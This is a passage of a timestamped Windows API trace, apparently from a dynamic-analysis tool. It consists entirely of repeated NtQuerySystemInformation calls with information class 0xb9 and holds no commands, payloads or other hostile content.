(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x20, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0233.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7f0, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5f0, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5a0, Length=0x20, ResultLength=0x0) [0234.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd550, Length=0x20, ResultLength=0x0) [0234.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 